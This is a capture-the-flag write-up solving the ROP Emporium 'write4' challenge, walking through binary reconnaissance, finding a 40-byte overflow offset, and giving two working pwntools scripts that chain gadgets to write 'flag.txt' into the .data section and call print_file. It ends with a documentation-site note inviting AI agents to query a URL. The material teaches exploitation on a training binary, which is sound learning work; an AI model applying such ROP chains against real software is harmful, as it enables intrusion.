# write464 ## Intro today we are going to be tackling the 4th challenge on ROP Emporium which is a series of challenges to teach ROP `Return Oriented Programming`

download the x86 zip file and extract it using unzip, you will get 2 files a 32 bit executable and a flag.txt file which will be revealed if you exploit the binary ## Basic Executable Reconnaissance the executable is not stripped which makes reverse engeneering easier because it doesnt hide function names and the executable is dynamically linked so the libc library which contains many external functions like fprintf() are not loaded within the executable but they dynamically linked at the execution time

we have only one security configuration enabled which is NX `No-Execute` also known as `Data Execution Prevention or DEP` marks certain areas of the program as not executable, meaning that stored input or data cannot be executed as code. This is significant because it prevents attackers from being able to jump to custom shellcode that they've stored on the stack or in a global variable. ``` checksec --file=write4 ```

let's locate **strings** and **functions** imported in this binary using rabin2

using ghidra to do more reversing on this binary we find the print\_file() function which takes the string "nonexsistent" as argument so our goal is to write the flag.txt string somewhere and call the print\_file() function with the argument flag.txt so it can be printed

let's take a look at the sections and their sizes and permissions in order to write our string somewhere there

now we will pick one of this sections that meets those conditions : * enough size so we can write our string * the section should be writeable but even if those conditions are meet there is high possibility if the section we have choosed contains other data this may corrupt the binary so using ghidra let's take a look on the sections and find which sections maybe interesting for our purpose , data section is empty so this makes it a good one to write in it our string flag.txt

## Locate RIP Offset we will use gdb-pwndbg and cyclic from pwntools to generate a pattern and overwrite RIP and then search the pattern that made into RIP to find the offset to the RIP

let's run the program and send this pattern as input, so faaaaaaa is the pattern that made it into the RIP

seaching the pattern and the **`offset is 40`**

## Writing flag.txt in data section using gdb-pwndbg list all the functions in the binary and we find a function called usefulgadgets

let's disassemble this function

mov QWORD PTR \[r14],r15; ret; => mov r15 register into the memory location pointed by the r14 register and then return so the idea here is to find a way to empty the r14 register and put the data section address in it and then put the 8 bytes of the string **"flag.txt"** in the r15 and then use this gadget **`mov QWORD PTR [r14],r15; ret;`** to write **"flag.txt"** string that is in the r15 in the memory location pointed by the data section address (r14) lets find the gadget that pops the r14 and the r15 using ropper

* pop the r14 and put the data section address in it * pop the r15 and put "flag.txt" inside it * mov the r15 (flag.txt) to the memory location pointed by the r14 (data section) * pop rdi and put the data address in it * call print\_file() function with the argument in the rdi using ropper to find the pop rdi gadget

## Exploitation ```python from pwn import * # Set up pwntools for the correct architecture exe = './write4' elf = context.binary = ELF(exe, checksec=False) io = process(exe) offset = 40 # the offset to the RIP print_file = 0x00400510 # the function we want to return to data_addr = 0x00601028 # .data section address move_gadget = 0x400628 # mov qword ptr [r14], r15; ret; pop_r14_r15 = 0x400690 # pop r14; pop r15; ret; pop_rdi = 0x400693 # pop rdi; ret; payload = flat( asm('nop') * offset, #padding to the RIP pop_r14_r15, # pop the r14 and r15 data_addr, # putting the data section address into the r14 b"flag.txt", # putting the "flag.txt" string in the r15 move_gadget, # move the r15 into the memory location pointed by the r14 pop_rdi, # pop the rdi (first argument) data_addr, # first argument of the print_file() function print_file, # RIP calling the print_file() function ) write("payload", payload) io.sendlineafter(b'>', payload) io.interactive() ``` let's run the script and BOOM we've got the flag

another exploit using ROP class ```python from pwn import * # Set up pwntools for the correct architecture exe = './write4' elf = context.binary = ELF(exe, checksec=False) io = process(exe) offset = 40 move_gadget = 0x400628 # mov qword ptr [r14], r15; ret; pop_r14_r15 = 0x400690 # pop r14; pop r15; ret; data_addr = elf.symbols.data_start # .data section address rop = ROP(elf) #write first 8 bytes into the data section rop.raw([pop_r14_r15,data_addr,b"flag.txt",move_gadget]) rop.print_file(data_addr) payload = flat( asm('nop') * offset, rop.chain() ) write("payload", payload) io.sendlineafter(b'>', payload) io.interactive() ``` let's run this script and BOOM we've got the flag

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sayonara.gitbook.io/writeups/binary-exploitation/rop-emporium/write464.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.